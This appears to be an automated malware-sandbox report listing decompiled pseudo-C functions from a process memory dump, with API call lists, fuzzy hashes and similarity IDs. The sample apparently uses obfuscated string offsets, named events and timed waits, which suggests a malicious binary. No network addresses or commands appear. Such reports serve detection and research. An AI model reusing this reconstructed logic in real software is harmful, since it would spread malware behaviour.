                                                          					_t5 = _t103 + 0x467e038; // 0x3050f485
                                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                          					_t56 = _v8;
                                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                          					if(_t118 >= 0) {
                                                          						__imp__#2(0x467c290);
                                                          						_v28 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_t118 = 0x8007000e;
                                                          						} else {
                                                          							_t60 = _v32;
                                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                          							_t87 = __imp__#6;
                                                          							_t118 = _t61;
                                                          							if(_t118 >= 0) {
                                                          								_t63 = _v24;
                                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                          								if(_t118 >= 0) {
                                                          									_t130 = _v20;
                                                          									if(_t130 != 0) {
                                                          										_t67 = 3;
                                                          										_v64 = _t67;
                                                          										_v48 = _t67;
                                                          										_v56 = 0;
                                                          										_v40 = 0;
                                                          										if(_t130 > 0) {
                                                          											while(1) {
                                                          												_t68 = _v24;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t123 = _t123;
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												asm("movsd");
                                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                          												if(_t118 < 0) {
                                                          													goto L16;
                                                          												}
                                                          												_t70 = _v8;
                                                          												_t109 =  *0x467d2a8; // 0x47a5a8
                                                          												_t28 = _t109 + 0x467e0bc; // 0x3050f1ff
                                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                          												if(_t118 >= 0) {
                                                          													_t75 = _v16;
                                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                          													if(_t118 >= 0 && _v12 != 0) {
                                                          														_t79 =  *0x467d2a8; // 0x47a5a8
                                                          														_t33 = _t79 + 0x467e078; // 0x76006f
                                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                                          															_t83 = _v16;
                                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                          														}
                                                          														 *_t87(_v12);
                                                          													}
                                                          													_t77 = _v16;
                                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                          												}
                                                          												_t72 = _v8;
                                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                          												_v40 = _v40 + 1;
                                                          												if(_v40 < _v20) {
                                                          													continue;
                                                          												}
                                                          												goto L16;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								L16:
                                                          								_t65 = _v24;
                                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                          							}
                                                          							 *_t87(_v28);
                                                          						}
                                                          						_t58 = _v32;
                                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                          					}
                                                          				}
                                                          				return _t118;
                                                          			}






































                                                          APIs
                                                          • SysAllocString.OLEAUT32(0467C290), ref: 04676F8A
                                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 0467706B
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04677084
                                                          • SysFreeString.OLEAUT32(?), ref: 046770B3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$Free$Alloclstrcmp
                                                          • String ID:
                                                          • API String ID: 1885612795-0
                                                          • Opcode ID: 8890ea68758b7257839c998a6e46ce3aa2db181bedc89768fb44e39a87b7e634
                                                          • Instruction ID: c19537f310ba417333e71f6cb47b476e6e3bde0c831e18428434d02b3a13706e
                                                          • Opcode Fuzzy Hash: 8890ea68758b7257839c998a6e46ce3aa2db181bedc89768fb44e39a87b7e634
                                                          • Instruction Fuzzy Hash: C3510D75D00519EFCB10DFE8C888DAEB7B9EF89705B158598E915EB310E732AD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E046753C6(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				signed int _v16;
                                                          				void _v92;
                                                          				void _v236;
                                                          				void* _t55;
                                                          				unsigned int _t56;
                                                          				signed int _t66;
                                                          				signed int _t74;
                                                          				void* _t76;
                                                          				signed int _t79;
                                                          				void* _t81;
                                                          				void* _t92;
                                                          				void* _t96;
                                                          				signed int* _t99;
                                                          				signed int _t101;
                                                          				signed int _t103;
                                                          				void* _t107;
                                                          
                                                          				_t92 = _a12;
                                                          				_t101 = __eax;
                                                          				_t55 = E04671AD1(_a16, _t92);
                                                          				_t79 = _t55;
                                                          				if(_t79 == 0) {
                                                          					L18:
                                                          					return _t55;
                                                          				}
                                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                          				_t81 = 0;
                                                          				_t96 = 0x20;
                                                          				if(_t56 == 0) {
                                                          					L4:
                                                          					_t97 = _t96 - _t81;
                                                          					_v12 = _t96 - _t81;
                                                          					E046750FF(_t79,  &_v236);
                                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04675745(_t101,  &_v236, _a8, _t96 - _t81);
                                                          					E04675745(_t79,  &_v92, _a12, _t97);
                                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                          					_t66 = E046750FF(_t101, 0x467d1b0);
                                                          					_t103 = _t101 - _t79;
                                                          					_a8 = _t103;
                                                          					if(_t103 < 0) {
                                                          						L17:
                                                          						E046750FF(_a16, _a4);
                                                          						E04675088(_t79,  &_v236, _a4, _t97);
                                                          						memset( &_v236, 0, 0x8c);
                                                          						_t55 = memset( &_v92, 0, 0x44);
                                                          						goto L18;
                                                          					}
                                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                          					do {
                                                          						if(_v8 != 0xffffffff) {
                                                          							_push(1);
                                                          							_push(0);
                                                          							_push(0);
                                                          							_push( *_t99);
                                                          							L0467AF2E();
                                                          							_t74 = _t66 +  *(_t99 - 4);
                                                          							asm("adc edx, esi");
                                                          							_push(0);
                                                          							_push(_v8 + 1);
                                                          							_push(_t92);
                                                          							_push(_t74);
                                                          							L0467AF28();
                                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                          								_t74 = _t74 | 0xffffffff;
                                                          								_v16 = _v16 & 0x00000000;
                                                          							}
                                                          						} else {
                                                          							_t74 =  *_t99;
                                                          						}
                                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                          						_a12 = _t74;
                                                          						_t76 = E04675F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                          						while(1) {
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							L13:
                                                          							_t92 =  &_v92;
                                                          							if(E046790C2(_t79, _t92, _t106) < 0) {
                                                          								break;
                                                          							}
                                                          							L14:
                                                          							_a12 = _a12 + 1;
                                                          							_t76 = E04676044(_t79,  &_v92, _t106, _t106);
                                                          							 *_t99 =  *_t99 - _t76;
                                                          							if( *_t99 != 0) {
                                                          								goto L14;
                                                          							}
                                                          							goto L13;
                                                          						}
                                                          						_a8 = _a8 - 1;
                                                          						_t66 = _a12;
                                                          						_t99 = _t99 - 4;
                                                          						 *(0x467d1b0 + _a8 * 4) = _t66;
                                                          					} while (_a8 >= 0);
                                                          					_t97 = _v12;
                                                          					goto L17;
                                                          				}
                                                          				while(_t81 < _t96) {
                                                          					_t81 = _t81 + 1;
                                                          					_t56 = _t56 >> 1;
                                                          					if(_t56 != 0) {
                                                          						continue;
                                                          					}
                                                          					goto L4;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04675473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04675489
                                                          • memset.NTDLL ref: 04675529
                                                          • memset.NTDLL ref: 04675539
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: f7a145b2f1bd4c3d077c31fb7f8a7517229eddf5b9689b8c9ccea3d4083bf820
                                                          • Instruction ID: 11fbe8de8ffa0a22658ac8a7696cd11566b0f9e79f2ae0a92c1f6e9c87396ab7
                                                          • Opcode Fuzzy Hash: f7a145b2f1bd4c3d077c31fb7f8a7517229eddf5b9689b8c9ccea3d4083bf820
                                                          • Instruction Fuzzy Hash: 7D418E71A00219BBEB10DFA8CC80BDE7765EF44314F1085A9B91AA7684FB70B9598B94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 0467A82E
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • ResetEvent.KERNEL32(?), ref: 0467A8A2
                                                          • GetLastError.KERNEL32 ref: 0467A8C5
                                                          • GetLastError.KERNEL32 ref: 0467A970
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: d9e91709bfeaf8362f86ade082e21b95cf24ed5205e7f323266ef240f8d0540b
                                                          • Instruction ID: 6eb224cc7867e1c68047896bc37811184332a7496e46ecce76025c313e6b5a7f
                                                          • Opcode Fuzzy Hash: d9e91709bfeaf8362f86ade082e21b95cf24ed5205e7f323266ef240f8d0540b
                                                          • Instruction Fuzzy Hash: 8C417B71600204BFDB219FE1DC88EAF7BBDEF99744B104929F642E2291F735A955CA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 42%
                                                          			E046715FF(void* __eax, void* __ecx) {
                                                          				char _v8;
                                                          				void* _v12;
                                                          				intOrPtr _v16;
                                                          				char _v20;
                                                          				void* __esi;
                                                          				void* _t30;
                                                          				intOrPtr _t38;
                                                          				intOrPtr* _t39;
                                                          				intOrPtr* _t41;
                                                          				void* _t54;
                                                          				long _t64;
                                                          				void* _t67;
                                                          				void* _t69;
                                                          
                                                          				_t58 = __ecx;
                                                          				_t67 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t30 = _t67;
                                                          					_pop(_t68);
                                                          					_t69 = _t30;
                                                          					_t64 = 0;
                                                          					ResetEvent( *(_t69 + 0x1c));
                                                          					_push( &_v8);
                                                          					_push(4);
                                                          					_push( &_v20);
                                                          					_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          					if( *0x467d134() != 0) {
                                                          						L9:
                                                          						if(_v8 == 0) {
                                                          							 *((intOrPtr*)(_t69 + 0x30)) = 0;
                                                          						} else {
                                                          							 *0x467d164(0, 1,  &_v12);
                                                          							if(0 != 0) {
                                                          								_t64 = 8;
                                                          							} else {
                                                          								_t38 = E0467A71F(0x1000);
                                                          								_v16 = _t38;
                                                          								if(_t38 == 0) {
                                                          									_t64 = 8;
                                                          								} else {
                                                          									_push(0);
                                                          									_push(_v8);
                                                          									_push( &_v20);
                                                          									while(1) {
                                                          										_t41 = _v12;
                                                          										_t61 =  *_t41;
                                                          										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
                                                          										ResetEvent( *(_t69 + 0x1c));
                                                          										_push( &_v8);
                                                          										_push(0x1000);
                                                          										_push(_v16);
                                                          										_push( *((intOrPtr*)(_t69 + 0x18)));
                                                          										if( *0x467d134() != 0) {
                                                          											goto L17;
                                                          										}
                                                          										_t64 = GetLastError();
                                                          										if(_t64 == 0x3e5) {
                                                          											_t64 = E04675646( *(_t69 + 0x1c), _t61, 0xffffffff);
                                                          											if(_t64 == 0) {
                                                          												_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          												if(_t64 == 0) {
                                                          													goto L17;
                                                          												}
                                                          											}
                                                          										}
                                                          										L19:
                                                          										E0467A734(_v16);
                                                          										if(_t64 == 0) {
                                                          											_t64 = E046770CC(_v12, _t69);
                                                          										}
                                                          										goto L22;
                                                          										L17:
                                                          										_t64 = 0;
                                                          										if(_v8 != 0) {
                                                          											_push(0);
                                                          											_push(_v8);
                                                          											_push(_v16);
                                                          											continue;
                                                          										}
                                                          										goto L19;
                                                          									}
                                                          								}
                                                          								L22:
                                                          								_t39 = _v12;
                                                          								 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t64 = GetLastError();
                                                          						if(_t64 != 0x3e5) {
                                                          							L8:
                                                          							if(_t64 == 0) {
                                                          								goto L9;
                                                          							}
                                                          						} else {
                                                          							_t64 = E04675646( *(_t69 + 0x1c), _t58, 0xffffffff);
                                                          							if(_t64 == 0) {
                                                          								_t64 =  *((intOrPtr*)(_t69 + 0x28));
                                                          								goto L8;
                                                          							}
                                                          						}
                                                          					}
                                                          					return _t64;
                                                          				} else {
                                                          					_t54 = E04679242(__ecx, __eax);
                                                          					if(_t54 != 0) {
                                                          						return _t54;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

















                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 046718EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04671907
                                                          • ResetEvent.KERNEL32(?), ref: 04671980
                                                          • GetLastError.KERNEL32 ref: 0467199B
                                                            • Part of subcall function 04679242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04679259
                                                            • Part of subcall function 04679242: SetEvent.KERNEL32(?), ref: 04679269
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 116fab3cca07f5e6533ade87cae026cbfbbdf583b15a8f992efdafd0f1d1d18a
                                                          • Instruction ID: 728181375953adb32a2c9b89e540b39aa616154470d5cb3f700b249e315a8290
                                                          • Opcode Fuzzy Hash: 116fab3cca07f5e6533ade87cae026cbfbbdf583b15a8f992efdafd0f1d1d18a
                                                          • Instruction Fuzzy Hash: 7741B232700604ABDB219FA5DC44AEEB7B9EF85365F10066AE552D7390FA30FD429B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 04673B0D
                                                          • SysAllocString.OLEAUT32(046785ED), ref: 04673B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04673B73
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: ac7ab6dfe1a30ac736e8f77d8a486e9576111c94421a9d3a91c97a7b222fc62b
                                                          • Instruction ID: d76efe26a1b6ae535381e52f584fd0b99c690f8ad147b39198999610513675f9
                                                          • Opcode Fuzzy Hash: ac7ab6dfe1a30ac736e8f77d8a486e9576111c94421a9d3a91c97a7b222fc62b
                                                          • Instruction Fuzzy Hash: 1F310E71900209EFCB04DFA8D8C08AE7BB9FF58750B10842EF90697350E735AA85DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 87%
                                                          			E046711EE(signed int _a4, signed int* _a8) {
                                                          				void* __ecx;
                                                          				void* __edi;
                                                          				signed int _t6;
                                                          				intOrPtr _t8;
                                                          				intOrPtr _t12;
                                                          				short* _t19;
                                                          				void* _t25;
                                                          				signed int* _t28;
                                                          				CHAR* _t30;
                                                          				long _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t6 =  *0x467d270; // 0xd448b889
                                                          				_t32 = _a4;
                                                          				_a4 = _t6 ^ 0x109a6410;
                                                          				_t8 =  *0x467d2a8; // 0x47a5a8
                                                          				_t3 = _t8 + 0x467e87e; // 0x61636f4c
                                                          				_t25 = 0;
                                                          				_t30 = E046738A8(_t3, 1);
                                                          				if(_t30 != 0) {
                                                          					_t25 = CreateEventA(0x467d2ac, 1, 0, _t30);
                                                          					E0467A734(_t30);
                                                          				}
                                                          				_t12 =  *0x467d25c; // 0x4000000a
                                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0467A65C() != 0) {
                                                          					L12:
                                                          					_t28 = _a8;
                                                          					if(_t28 != 0) {
                                                          						 *_t28 =  *_t28 | 0x00000001;
                                                          					}
                                                          					_t31 = E04678EA1(_t32, 0);
                                                          					if(_t31 == 0 && _t25 != 0) {
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          					}
                                                          					if(_t28 != 0 && _t31 != 0) {
                                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                                          					}
                                                          					goto L20;
                                                          				} else {
                                                          					_t19 =  *0x467d10c( *_t32, 0x20);
                                                          					if(_t19 != 0) {
                                                          						 *_t19 = 0;
                                                          						_t19 = _t19 + 2;
                                                          					}
                                                          					_t31 = E0467A273(0,  *_t32, _t19, 0);
                                                          					if(_t31 == 0) {
                                                          						if(_t25 == 0) {
                                                          							L22:
                                                          							return _t31;
                                                          						}
                                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                          						if(_t31 == 0) {
                                                          							L20:
                                                          							if(_t25 != 0) {
                                                          								CloseHandle(_t25);
                                                          							}
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          					goto L12;
                                                          				}
                                                          			}















                                                          APIs
                                                            • Part of subcall function 046738A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04AF9A98,00000000,?,?,63699BC3,00000005,0467D00C,?,?,04675D30), ref: 046738DE
                                                            • Part of subcall function 046738A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04673902
                                                            • Part of subcall function 046738A8: lstrcat.KERNEL32(00000000,00000000), ref: 0467390A
                                                          • CreateEventA.KERNEL32(0467D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?), ref: 0467122F
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04673760,00000000,00000000,?,00000000,?,04673760,?,00000001,?,?,?,?,046752AA), ref: 0467128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?), ref: 046712BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04673760,?,00000001,?,?,?,?,046752AA), ref: 046712D5
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: 8a4f66580711c50c26788ee42e8d3c5748745169fa43103a4413eb72cf69f383
                                                          • Instruction ID: a4bb887fec44bce4dc93fadf54279e051d4f55a502b90313352d8d1fe7e69c43
                                                          • Opcode Fuzzy Hash: 8a4f66580711c50c26788ee42e8d3c5748745169fa43103a4413eb72cf69f383
                                                          • Instruction Fuzzy Hash: BF21E4326003106BD7215EA88C44AEB73A9FFAB710B15061AFF65E7340FB65ED818694
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 38%
                                                          			E04679242(void* __ecx, void* __esi) {
                                                          				char _v8;
                                                          				long _v12;
                                                          				char _v16;
                                                          				long _v20;
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          				intOrPtr* _t60;
                                                          				void* _t61;
                                                          
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				_t60 =  *0x467d13c; // 0x467abf1
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                          				do {
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_push( &_v16);
                                                          						_push( &_v8);
                                                          						_push(_t61 + 0x2c);
                                                          						_push(0x20000013);
                                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						if( *_t60() == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E0467A71F(_v8 + 1);
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;
                                                          							} else {
                                                          								_push( &_v16);
                                                          								_push( &_v8);
                                                          								_push(_t58);
                                                          								_push(0x16);
                                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                          								if( *_t60() == 0) {
                                                          									E0467A734(_t58);
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;
                                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					_t42 = E04675646( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}
















                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04679259
                                                          • SetEvent.KERNEL32(?), ref: 04679269
                                                          • GetLastError.KERNEL32 ref: 046792F2
                                                            • Part of subcall function 04675646: WaitForMultipleObjects.KERNEL32(00000002,0467A8E3,00000000,0467A8E3,?,?,?,0467A8E3,0000EA60), ref: 04675661
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04679327
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 707f55a90e6e121e7475679d7074c8742d9810986055e7febdf723ce17c8b87a
                                                          • Instruction ID: 11d62f7217f2487d322f07f6cbb2179643495315f86f39e4d43d1835bfa37785
                                                          • Opcode Fuzzy Hash: 707f55a90e6e121e7475679d7074c8742d9810986055e7febdf723ce17c8b87a
                                                          • Instruction Fuzzy Hash: D73103B5900309EFEB20DFF5D8C499EB7F8FB14314F10496AD542E2250E735AA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 40%
                                                          			E046736B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                          				intOrPtr _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				char _v32;
                                                          				void* __esi;
                                                          				void* _t29;
                                                          				void* _t38;
                                                          				signed int* _t39;
                                                          				void* _t40;
                                                          
                                                          				_t36 = __ecx;
                                                          				_v32 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_v12 = _a4;
                                                          				_t38 = E04673BB9(__ecx,  &_v32);
                                                          				if(_t38 != 0) {
                                                          					L12:
                                                          					_t39 = _a8;
                                                          					L13:
                                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                                          						_t16 =  &(_t39[1]); // 0x5
                                                          						_t23 = _t16;
                                                          						if( *_t16 != 0) {
                                                          							E04674F79(_t23);
                                                          						}
                                                          					}
                                                          					return _t38;
                                                          				}
                                                          				if(E0467A2F9(0x40,  &_v16) != 0) {
                                                          					_v16 = 0;
                                                          				}
                                                          				_t40 = CreateEventA(0x467d2ac, 1, 0,  *0x467d344);
                                                          				if(_t40 != 0) {
                                                          					SetEvent(_t40);
                                                          					Sleep(0xbb8);
                                                          					CloseHandle(_t40);
                                                          				}
                                                          				_push( &_v32);
                                                          				if(_a12 == 0) {
                                                          					_t29 = E0467A446(_t36);
                                                          				} else {
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0);
                                                          					_t29 = E0467853F(_t36);
                                                          				}
                                                          				_t41 = _v16;
                                                          				_t38 = _t29;
                                                          				if(_v16 != 0) {
                                                          					E04674F14(_t41);
                                                          				}
                                                          				if(_t38 != 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					_t39 = _a8;
                                                          					_t38 = E046711EE( &_v32, _t39);
                                                          					goto L13;
                                                          				}
                                                          			}

                                                          APIs
                                                          • CreateEventA.KERNEL32(0467D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,046752AA,?,00000001,?), ref: 04673702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 0467370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 0467371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,046752AA,?,00000001,?,00000002,?,?,04675D5E,?), ref: 04673721
                                                            • Part of subcall function 0467A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04673741,?,04673741,?,?,?,?,?,04673741,?), ref: 0467A520
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
